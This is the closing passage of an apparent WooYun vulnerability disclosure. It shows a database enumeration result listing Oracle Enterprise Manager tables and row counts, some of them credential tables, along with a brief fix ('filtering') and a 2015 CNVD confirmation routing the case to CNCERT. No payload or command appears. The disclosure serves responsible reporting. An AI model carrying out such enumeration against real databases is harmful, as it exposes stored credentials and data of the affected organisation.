| MGMT_JOB_TYPE_INFO             | 53      |
| MGMT_ARU_PLATFORMS             | 49      |
| ESM_COLLECTION                 | 48      |
| MGMT_TARGET_PROPERTIES         | 45      |
| MGMT_PURGE_POLICY_TARGET_STATE | 44      |
| MGMT_PERFORMANCE_NAMES         | 43      |
| MGMT_POLICY_VIOLATION_VALUES   | 43      |
| MGMT_ARU_LANGUAGES             | 37      |
| MGMT_STRING_METRIC_HISTORY     | 37      |
| MGMT_ECM_SNAPSHOT_METADATA     | 34      |
| MGMT_JOB_TYPE_DISPLAY_INFO     | 31      |
| MGMT_JOB_COMMAND               | 30      |
| MGMT_NOTIFY_RULE_CONFIGS       | 30      |
| MGMT_TYPE_PROPERTIES           | 26      |
| MGMT_NOTIFY_QUEUES             | 24      |
| MGMT_JOB_VALUE_PARAMS          | 23      |
| MGMT_TARGET_TYPES              | 23      |
| MGMT_ECM_ARU_MAP               | 22      |
| MGMT_METRICS_EXT               | 20      |
| MGMT_POLICY_VIOLATION_ROWS     | 20      |
| MGMT_METADATA_SETS             | 19      |
| MGMT_PRIVS                     | 19      |
| MGMT_SEVERITY                  | 19      |
| MGMT_CREDENTIAL_SET_COLUMNS    | 18      |
| MGMT_DB_SGA_ECM                | 18      |
| MGMT_JOB_CRED_PARAMS           | 18      |
| MGMT_POLICY_SNAPSHOT_CRITERIA  | 18      |
| MGMT_USER_FOLDERS              | 18      |
| MGMT_ECM_RESOURCES             | 14      |
| MGMT_METRICS_1HOUR             | 14      |
| MGMT_TARGET_PROP_DEFS          | 14      |
| MGMT_METRIC_DEPENDENCY_DEF     | 13      |
| MGMT_DB_DATAFILES_ECM          | 12      |
| MGMT_DB_TABLESPACES_ECM        | 12      |
| MGMT_ECM_GEN_SNAPSHOT          | 12      |
| MGMT_JOB_PROP_PARAMS           | 12      |
| MGMT_PRIV_INCLUDES             | 12      |
| MGMT_PURGE_POLICY              | 12      |
| MGMT_LICENSABLE_TARGET_TYPES   | 11      |
| MGMT_PRIV_GRANTS               | 10      |
| MGMT_AVAILABILITY              | 9       |
| MGMT_METRIC_COLLECTIONS_REP    | 9       |
| MGMT_POLICY_TARGET_CRITERIA    | 9       |
| MGMT_CREDENTIAL_SETS           | 8       |
| MGMT_CREDENTIAL_TYPE_COLUMNS   | 8       |
| MGMT_POLICY_VIOLATIONS         | 8       |
| MGMT_TARGET_DELETE_EXCEPTIONS  | 8       |
| MGMT_JOB_SINGLE_TARGET_TYPES   | 7       |
| MGMT_OMS_PARAMETERS            | 7       |
| MGMT_POLICY_RULE_CRITERIA      | 7       |
| MGMT_PURGE_POLICY_GROUP        | 7       |
| MGMT_TARGET_DELETE_CALLBACKS   | 7       |
| MGMT_USER_TYPE_METRIC_PREFS    | 7       |
| MGMT_DB_CONTROLFILES_ECM       | 6       |
| MGMT_DB_REDOLOGS_ECM           | 6       |
| MGMT_NOTIFY_RULES              | 6       |
| MGMT_PARAMETERS                | 6       |
| MGMT_POLICY_GROUP              | 6       |
| MGMT_ADMIN_LICENSES            | 5       |
| MGMT_AVAILABILITY_MARKER       | 5       |
| MGMT_BLACKOUT_PROXY_TARGETS    | 5       |
| MGMT_CURRENT_AVAILABILITY      | 5       |
| MGMT_DELTA_SNAP                | 5       |
| MGMT_LICENSE_DEFINITIONS       | 5       |
| MGMT_TARGETS                   | 5       |
| MGMT_COLLECTION_PROPERTIES     | 4       |
| MGMT_CREATED_USERS             | 4       |
| MGMT_CREDENTIAL_TYPES          | 4       |
| MGMT_ECM_SNAP_COMPONENT_INFO   | 4       |
| MGMT_HC_CPU_DETAILS            | 4       |
| MGMT_JOB_NESTED_JOB_TARGETS    | 4       |
| MGMT_JOB_SEC_INFO              | 4       |
| MGMT_TARGET_TYPE_COMPONENT_MAP | 4       |
| MGMT_USER_CALLBACKS            | 4       |
| MGMT_USER_CONTEXT              | 4       |
| MGMT_CREDENTIALS2              | 3       |
| MGMT_JOB_EXECUTION             | 3       |
| MGMT_JOB_HISTORY               | 3       |
| MGMT_JOB_SQL_PARAMS            | 3       |
| MGMT_JOB_SUBST_PARAMS          | 3       |
| MGMT_NOTIFY_PROFILES           | 3       |
| AQ$_MGMT_NOTIFY_QTABLE_S       | 2       |
| MGMT_DB_DBNINSTANCEINFO_ECM    | 2       |
| MGMT_DB_LICENSE_ECM            | 2       |
| MGMT_DB_ROLLBACK_SEGS_ECM      | 2       |
| MGMT_FAILOVER_CALLBACKS        | 2       |
| MGMT_HA_INFO_ECM               | 2       |
| MGMT_HA_RMAN_CONFIG_ECM        | 2       |
| MGMT_HC_FS_MOUNT_DETAILS       | 2       |
| MGMT_INV_CONTAINER             | 2       |
| MGMT_JOB_PURGE_POLICIES        | 2       |
| MGMT_LOGIN_ASSISTANTS          | 2       |
| MGMT_VERSIONS                  | 2       |
| MGMT_BLACKOUT_REASON           | 1       |
| MGMT_CREDENTIAL_TYPE_REF       | 1       |
| MGMT_CURRENT_SEVERITY          | 1       |
| MGMT_DB_HDM_METRIC_HELPER      | 1       |
| MGMT_ECM_SNAPSHOT              | 1       |
| MGMT_EMCRYPTO_SEED             | 1       |
| MGMT_EMD_PING                  | 1       |
| MGMT_HA_MTTR                   | 1       |
| MGMT_HC_HARDWARE_MASTER        | 1       |
| MGMT_HC_OS_SUMMARY             | 1       |
| MGMT_HC_SYSTEM_SUMMARY         | 1       |
| MGMT_JOB                       | 1       |
| MGMT_JOB_EVENT                 | 1       |
| MGMT_JOB_EXEC_SUMMARY          | 1       |
| MGMT_JOB_PURGE_CRITERIA        | 1       |
| MGMT_JOB_PURGE_VALUES          | 1       |
| MGMT_JOB_SCHEDULE              | 1       |
| MGMT_JOB_USER_PARAMS           | 1       |
| MGMT_MASTER_CHANGED_CALLBACK   | 1       |
| MGMT_REBUILD_INDEXES           | 1       |
| MGMT_ROLE_GRANTS               | 1       |
| MGMT_ROLES                     | 1       |
| MGMT_SEC_INFO                  | 1       |
| MGMT_TARGET_ADD_CALLBACKS      | 1       |
| MGMT_TARGET_CREDENTIALS        | 1       |
| MGMT_USER_JOBS                 | 1       |
| MGMT_VIEW_USER_CREDENTIALS     | 1       |
+--------------------------------+---------+


1.jpg

修复方案:

过滤

版权声明:转载请注明来源 水木之原@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-22 09:35

厂商回复:

cnvd确认并复现所述情况,转由cncert下发给吉林分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论